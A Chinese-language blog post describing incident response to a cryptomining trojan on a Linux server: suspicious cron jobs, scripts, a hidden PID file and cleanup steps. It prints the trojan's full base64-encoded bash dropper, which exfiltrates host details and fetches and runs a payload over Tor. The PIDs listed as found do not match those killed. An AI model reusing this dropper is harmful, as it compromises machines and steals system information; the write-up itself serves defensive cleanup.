LINUX惨遭挖矿
参考:.systemd-service.sh挖矿木马排查shanbaobin的博客-CSDN博客.systemd-service.sh,手动记录
top命令查看进程,发现某不知名进程占满cpu,导致我很多服务不可用
top命令查看
先排查
crontab:
crontab -l
发现有个可疑脚本:/root/.systemd-service.sh
查看一下:
[root@10-9-181-78 ~]# cat /root/.systemd-service.sh
#!/bin/bash
exec &>/dev/null
echo xeVBa2qNgxz++OO5fCAs7pMTNuXLyOMOvGt6Fhni+jH66NppNT+F7aWttcCLjX9x
echo eGVWQmEycU5neHorK09PNWZDQXM3cE1UTnVYTHlPTU92R3Q2RmhuaStqSDY2TnBwTlQrRjdhV3R0Y0NMalg5eApleGVjICY+L2Rldi9udWxsCmV4cG9ydCBQQVRIPSRQQVRIOiRIT01FOi9iaW46L3NiaW46L3Vzci9iaW46L3Vzci9zYmluOi91c3IvbG9jYWwvYmluOi91c3IvbG9jYWwvc2JpbgoKZD0kKGdyZXAgeDokKGlkIC11KTogL2V0Yy9wYXNzd2R8Y3V0IC1kOiAtZjYpCmM9JChlY2hvICJjdXJsIC00ZnNTTGtBLSAtbTIwMCIpCnQ9JChlY2hvICJtaGV2a2s0b2RnenFwdDJoYmozaGh3MnV6NHZodW5vbzU1ZXZld3JnbW91eWllaGNhbHRtYnJxZCIpCgpzb2NreigpIHsKbj0oZG9oLm5sLmFoYWRucy5uZXQgZG5zLmhvc3R1eC5uZXQgdW5jZW5zb3JlZC5sdXgxLmRucy5uaXhuZXQueHl6IGRucy5ydWJ5ZmlzaC5jbiBkbnMudHduaWMudHcgZG9oLm5vLmFoYWRucy5uZXQgZG9oLWZpLmJsYWhkbnMuY29tIGZpLmRvaC5kbnMuc25vcHl0YS5vcmcgcmVzb2x2ZXItZXUubGVsdXguZmkgZG9oLmxpIGRucy5kaWdpdGFsZS1nZXNlbGxzY2hhZnQuY2gpCnA9JChlY2hvICJkbnMtcXVlcnk/bmFtZT1yZWxheS50b3Iyc29ja3MuaW4iKQpzPSQoJGMgaHR0cHM6Ly8ke25bJCgoUkFORE9NJTExKSldfS8kcCB8IGdyZXAgLW9FICJcYihbMC05XXsxLDN9XC4pezN9WzAtOV17MSwzfVxiIiB8dHIgJyAnICdcbid8Z3JlcCAtRXYgWy5dMHxzb3J0IC11UnxoZWFkIC1uIDEpCn0KCmZleGUoKSB7CmZvciBpIGluIC4gJEhPTUUgL3Vzci9iaW4gJGQgL3Zhci90bXAgO2RvIGVjaG8gZXhpdCA+ICRpL2kgJiYgY2htb2QgK3ggJGkvaSAmJiBjZCAkaSAmJiAuL2kgJiYgcm0gLWYgaSAmJiBicmVhaztkb25lCn0KCnUoKSB7CnNvY2t6CmY9L2ludC4kKHVuYW1lIC1tKQp4PS4vJChkYXRlfG1kNXN1bXxjdXQgLWYxIC1kLSkKcj0kKGN1cmwgLTRmc1NMayBjaGVja2lwLmFtYXpvbmF3cy5jb218fGN1cmwgLTRmc1NMayBpcC5zYilfJCh3aG9hbWkpXyQodW5hbWUgLW0pXyQodW5hbWUgLW4pXyQoaXAgYXxncmVwICdpbmV0ICd8YXdrIHsncHJpbnQgJDInfXxtZDVzdW18YXdrIHsncHJpbnQgJDEnfSlfJChjcm9udGFiIC1sfGJhc2U2NCAtdzApCiRjIC14IHNvY2tzNWg6Ly8kczo5MDUwICR0Lm9uaW9uJGYgLW8keCAtZSRyIHx8ICRjICQxJGYgLW8keCAtZSRyCmNobW9kICt4ICR4OyR4O3JtIC1mICR4Cn0KCmZvciBoIGluIHRvcjJ3ZWIuaW4gdG9yMndlYi5pdCBvbmlvbi5mb3VuZGF0aW9uIG9uaW9uLmNvbS5kZSBvbmlvbi5zaCB0b3Iyd2ViLnN1IApkbwppZiAhIGxzIC9wcm9jLyQoaGVhZCAtbiAxIC90bXAvLlgxMS11bml4LzAxKS9zdGF0dXM7IHRoZW4KZmV4ZTt1ICR0LiRoCmxzIC9wcm9jLyQoaGVhZCAtbiAxIC90bXAvLlgxMS11bml4LzAxKS9zdGF0dXMgfHwgKGNkIC90bXA7dSAkdC4kaCkKbHMgL3Byb2MvJChoZWFkIC1uIDEgL3RtcC8uWDExLXVuaXgvMDEpL3N0YXR1cyB8fCAoY2QgL2Rldi9zaG07dSAkdC4kaCkKZWxzZQpicmVhawpmaQpkb25lCg==|base64 -d|bash
很明显是被加密过,通过base64解密,获得如下:
解码后
发现可疑文件/tmp/.X11-unix/01,查看/tmp/.X11-unix目录下文件内容
/tmp/.X11-unix
从内容上看是该进程的两个进程ID,ps -ef|grep查看对应进程:
查看进程号
查看/etc/hosts文件是否正常,我这里是没有问题
来到/etc/cron.d/目录下发现可疑文件
/etc/cron.d/0systemd-service内容
这个指令指向/opt/目录下的systemd-service.sh,继续追踪:
依旧是加密过的
解密:
没啥新鲜的内容
至此:我们找到了
2个可疑定时任务分布在:crontab、/etc/cron.d/0systemd-service
2个可疑文件分布在:/root/.systemd-service.sh、/opt/systemd-service.sh
2个可疑进程PID:9332、21602
针对上边的问题进行处理:
- 清空.ssh/known_hosts里面可疑的公钥
- 清理crontab、删除/etc/cron.d/0systemd-service
- 删除/root/.systemd-service.sh、/opt/systemd-service.sh
- 杀掉2784024、3234955
注意:遇到这种挖矿木马一定要彻底清理干净,否则它就像小强一样打不死。之前我只是单纯的删除了定时任务和脚本,没有看脚本里面的内容,导致频频复发,最后定位到/tmp/.X11-unix/这个目录才找到幕后进程。一般被植入这种挖矿木马主要因为是某些漏洞问题,比如你安装了redis然后使用redis默认配置,没有设置密码,开放了6379端口,而你的redis中又有远程代码执行的漏洞,那么很容易中招。
我已处理完,过段时间看效果。
经过一夜,验证此法有效。
